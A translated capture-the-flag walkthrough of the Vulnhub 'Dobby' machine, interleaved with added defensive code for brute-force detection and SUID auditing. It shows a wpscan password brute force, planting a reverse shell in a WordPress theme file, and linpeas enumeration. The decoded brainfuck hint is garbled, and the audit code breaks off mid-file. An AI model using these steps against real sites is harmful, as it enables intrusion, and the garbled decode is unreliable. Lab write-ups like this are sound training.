
Vulnhub: Dobby detailed walkthrough (a different way of obtaining the WordPress backend password)

Posted: 2023-01-15 21:14:54

Dobby

Author: jason_huawen

Target information

Name: Hogwarts: Dobby

Address:


Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:9f:49:9e      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.207  08:00:27:a4:96:64      1      60  PCS Systemtechnik GmbH         

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.207.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 06:21 EST
Nmap scan report for 192.168.56.207
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:A4:96:64 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo 'dG9vIGVhc3kgbm8/IFBvdHRlcg==' | base64 -d
too easy no? Potter              

Is Potter a username?

Getting a shell

Visiting port 80, the source of the returned page contains a comment:


<!--
     See: /alohomora
  -->
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/alohomora/      
Draco's password is his house ;)

Is Draco a username? And his password is his house?

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ nikto -h http://192.168.56.207
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.207
+ Target Hostname:    192.168.56.207
+ Target Port:        80
+ Start Time:         2023-01-15 06:25:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2ae1, size: 5b3957e06e486, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-01-15 06:26:31 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.46) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? n


┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.207
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/15 06:27:12 Starting gobuster in directory enumeration mode
===============================================================
/log                  (Status: 200) [Size: 45]
/server-status        (Status: 403) [Size: 279]
Progress: 218329 / 220561 (98.99%)===============================================================
2023/01/15 06:27:38 Finished
===============================================================
                                                                    
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/log       
pass:OjppbGlrZXNvY2tz

hint --> /DiagonAlley
                         

/DiagonAlley is a WordPress site.

There is a post that is brainfuck encoded:

+++++ +++++ [->++ +++++ +++<] >.<++ +[->+ ++<]> ++.<+ ++[-> —<] >—-
..<++ ++[-> ++++< ]>+++ ++++. <++++ [->– –<]> .<+++ [->++ +<]>+ .<+++ +[->- —<] >–.< ++++[ ->+++ +<]>+ +++.- -.<++ +[->- –<]> —– .<+++ [->++ +<]>+ +++.<

After decoding:

donn��������
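As an added example (not from the original post), a small brainfuck interpreter for decoding such posts offline. It runs a constructed program in the same style, because the program as quoted above contains '—' and '–', which are not brainfuck commands: an interpreter skips them as comments, so the subtract instructions they replaced are lost and the output changes.

```python
# Added example, not from the original post: a minimal brainfuck interpreter
# for decoding hints like the one in the DiagonAlley post. The sample program
# below is constructed.


def run_brainfuck(program: str, input_bytes: bytes = b"") -> bytes:
    """Execute a brainfuck program and return its output as bytes.

    Cells are unsigned bytes that wrap around; the tape grows to the right on
    demand. Characters other than the eight commands are treated as comments,
    as the language specifies.
    """
    code = [c for c in program if c in "<>+-.,[]"]
    # Precompute matching bracket positions so jumps cost O(1).
    jump = {}
    stack = []
    for pos, cmd in enumerate(code):
        if cmd == "[":
            stack.append(pos)
        elif cmd == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {pos}")
            start = stack.pop()
            jump[start] = pos
            jump[pos] = start
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = [0]
    ptr = 0
    pc = 0
    inp = list(input_bytes)
    out = bytearray()
    while pc < len(code):
        cmd = code[pc]
        if cmd == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif cmd == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved left of cell 0")
            ptr -= 1
        elif cmd == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif cmd == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif cmd == ".":
            out.append(tape[ptr])
        elif cmd == ",":
            tape[ptr] = inp.pop(0) if inp else 0   # EOF reads as 0
        elif cmd == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif cmd == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return bytes(out)


# Constructed sample in the same style as the post (a multiplier loop, then
# small adjustments and prints). It spells "hi".
SAMPLE_PROGRAM = "++++++++++[->++++++++++<]>++++.+."


def decode_hint(program: str) -> str:
    """Run the program and decode its output as text, keeping bad bytes visible."""
    return run_brainfuck(program).decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(decode_hint(SAMPLE_PROGRAM))
```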

Which username does the password above belong to?

Logging in to the WordPress backend with draco and the password above does not work. Strange!!!

┌──(kali㉿kali)-[~]
└─$ echo 'OjppbGlrZXNvY2tz' | base64 -d
::ilikesocks

In fact, the password the author gave is base64 encoded.

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -e u,p                                
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:37:04 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
 |  - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>

[+] WordPress theme in use: amphibious
 | Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
 | Latest Version: 1.0.1 (up to date)
 | Last Updated: 2020-04-15T00:00:00.000Z
 | Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
 | Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
 | Style Name: Amphibious
 | Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
 | Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
 | Author: TemplatePocket
 | Author URI: https://templatepocket.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] draco
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.207/DiagonAlley/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Draco
 | Found By: Rss Generator (Passive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jan 15 06:37:07 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 15.186 KB
[+] Data Received: 303.258 KB
[+] Memory used: 233.68 MB
[+] Elapsed time: 00:00:03
                                                            
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -U draco -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:40:08 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
 |  - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>

[+] WordPress theme in use: amphibious
 | Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
 | Latest Version: 1.0.1 (up to date)
 | Last Updated: 2020-04-15T00:00:00.000Z
 | Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
 | Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
 | Style Name: Amphibious
 | Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
 | Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
 | Author: TemplatePocket
 | Author URI: https://templatepocket.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin                                                                                                 
Trying draco / slytherin Time: 00:04:10 <                                           > (14930 / 14359322)  0.10%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: draco, Password: slytherin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jan 15 06:44:24 2023
[+] Requests Done: 15070
[+] Cached Requests: 37
[+] Data Sent: 8.042 MB
[+] Data Received: 8.99 MB
[+] Memory used: 292.348 MB
[+] Elapsed time: 00:04:15

draco's password was cracked successfully: slytherin
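From the defender's side, the 15070 requests of that wpscan run land in the web server's access log. As an added example (not from the original post), a detector that flags clients posting to xmlrpc.php at a high rate; the log lines it runs on are constructed, and the client address used for the scanner is an assumption.

```python
# Added example, not from the original post: flag clients hammering xmlrpc.php,
# the endpoint WPScan used for its password attack above, in an Apache
# combined-format access log. All log lines below are constructed.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop any query string
        "status": int(m["status"]),
    }


def detect_xmlrpc_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: peak count} for clients that POSTed to xmlrpc.php at least
    `threshold` times within any interval of length `window`.

    The HTTP status is deliberately not used: WordPress answers a failed
    XML-RPC login with HTTP 200 and a fault inside the XML body, so request
    rate is the usable signal in the access log.
    """
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    peak = defaultdict(int)       # ip -> largest window count seen
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].endswith("/xmlrpc.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


def _log_line(ip, ts, method, path, status, size):
    """Build a constructed combined-format log line."""
    return (f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
            f'{status} {size} "-" "Mozilla/5.0 (constructed)"')


_T0 = datetime.strptime("15/Jan/2023:06:40:08 -0500", TS_FMT)
# Constructed sample: one ordinary visitor, then 120 login attempts from one
# client (assumed address) spread over 24 seconds.
SAMPLE_LOG = [
    _log_line("192.168.56.1", _T0, "GET", "/DiagonAlley/", 200, 5120),
    _log_line("192.168.56.1", _T0 + timedelta(seconds=5),
              "POST", "/DiagonAlley/xmlrpc.php", 200, 403),
] + [
    _log_line("192.168.56.206", _T0 + timedelta(seconds=i // 5),
              "POST", "/DiagonAlley/xmlrpc.php", 200, 403)
    for i in range(120)
]

if __name__ == "__main__":
    for ip, n in detect_xmlrpc_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to xmlrpc.php inside one 60 s window")
```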

Next, log in to the WordPress admin backend and, under Appearance -> Editor, edit 404.php, replacing its contents with the shell.php code.

The location of 404.php can be found by viewing the page source of the WordPress site's home page:

http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/404.php

On Kali Linux we receive the reverse shell from the target host:

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 34256
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 13:37:52 up  1:18,  0 users,  load average: 0.03, 0.05, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

www-data@HogWarts:/home/dobby$ ls -alh
ls -alh
total 92K
drwxr-xr-x 16 dobby dobby 4.0K Nov  7  2020 .
drwxr-xr-x  3 root  root  4.0K Nov  7  2020 ..
-rw-------  1 dobby dobby 1.9K Nov  8  2020 .bash_history
-rw-r--r--  1 dobby dobby  220 Nov  7  2020 .bash_logout
-rw-r--r--  1 dobby dobby 3.7K Nov  7  2020 .bashrc
drwx------ 15 dobby dobby 4.0K Nov  7  2020 .cache
drwxr-xr-x 12 dobby dobby 4.0K Nov  7  2020 .config
drwx------  3 dobby dobby 4.0K Nov  8  2020 .gnupg
drwxr-xr-x  3 dobby dobby 4.0K Nov  7  2020 .local
drwx------  5 dobby dobby 4.0K Nov  7  2020 .mozilla
-rw-------  1 dobby dobby  313 Nov  7  2020 .mysql_history
-rw-r--r--  1 dobby dobby  807 Nov  7  2020 .profile
drwx------  2 dobby dobby 4.0K Nov  7  2020 .ssh
-rw-r--r--  1 dobby dobby    0 Nov  7  2020 .sudo_as_admin_successful
drwxr-xr-x  3 dobby dobby 4.0K Nov  8  2020 Descargas
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Documentos
drwxr-xr-x  2 dobby dobby 4.0K Nov  8  2020 Escritorio
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Imágenes
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Música
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Plantillas
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Público
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Vídeos
-rw-rw-r--  1 dobby dobby  106 Nov  7  2020 flag1.txt
-r--r-----  1 root  root   755 Nov  7  2020 sudoers
www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"

flag1{28327a4964cb391d74111a185a5047ad}

Although the target host has no cat command, the more command can be used to read the first flag.

Privilege escalation

Upload the linpeas.sh script to the target's /tmp directory, make it executable, and run it. The relevant part of the output:

═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                       
                                         ╚═══════════════════╝                                                                
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
strings Not Found                                                                                                             
-rwsr-xr-x 1 root root 109K Oct  8  2020 /snap/snapd/9721/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                                                                          
-rwsr-xr-x 1 root root 43K Mar  5  2020 /snap/core18/1885/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                                    
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar  5  2020 /snap/core18/1885/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1885/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1885/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                     
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1885/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/1932/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                                    
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/1932/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1932/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1932/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                     
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1932/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug  3  2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct  6  2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 83K Oct  6  2020 /usr/libexec/sssd/p11_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 168K Oct  6  2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 31K Oct  6  2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 56K Oct  6  2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary)
-rwsr-xr-- 1 root dip 386K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29  2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30  2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                                      
-rwsr-xr-x 1 root root 179K Jul  8  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24  2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30  2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug  3  2020 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun  7  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                                                                                          
-rwsr-xr-- 1 root messagebus 51K Sep 10  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct  7  2020 /usr/lib/xorg/Xorg.wrap
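A listing like the one above is only useful if you know which entries are supposed to be there. As an added example (not from the original post), an audit that parses this `ls -l` layout and reports setuid-root binaries missing from a baseline; the baseline is a hypothetical one constructed for this host, and the sample lines are taken from the listing above plus one constructed non-SUID control line.

```python
# Added example, not from the original post: audit a SUID listing in the
# `ls -l` layout that linpeas prints above against a baseline of binaries that
# are expected to be setuid-root, and report the rest. The baseline is a
# constructed, hypothetical one; a real one is taken from a clean install.
import os
import re

# Hypothetical baseline: basenames that legitimately carry setuid root here.
BASELINE_SUID_ROOT = {
    "su", "sudo", "passwd", "chfn", "chsh", "gpasswd", "newgrp", "mount",
    "umount", "fusermount", "pkexec", "ssh-keysign", "snap-confine", "pppd",
    "polkit-agent-helper-1", "Xorg.wrap", "dbus-daemon-launch-helper",
}

# mode links owner group size month day year path [ ---> annotation]
LS_RE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})[+.]?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)"
)


def parse_ls_line(line):
    """Parse one `ls -l` style line; return None for anything else (headers, notes)."""
    m = LS_RE.match(line.strip())
    if m is None:
        return None
    mode = m["mode"]
    return {
        "path": m["path"],
        "owner": m["owner"],
        "group": m["group"],
        "setuid": mode[3] in "sS",   # 's' = setuid + exec, 'S' = setuid without exec
        "setgid": mode[6] in "sS",
        "world_exec": mode[9] == "x",
    }


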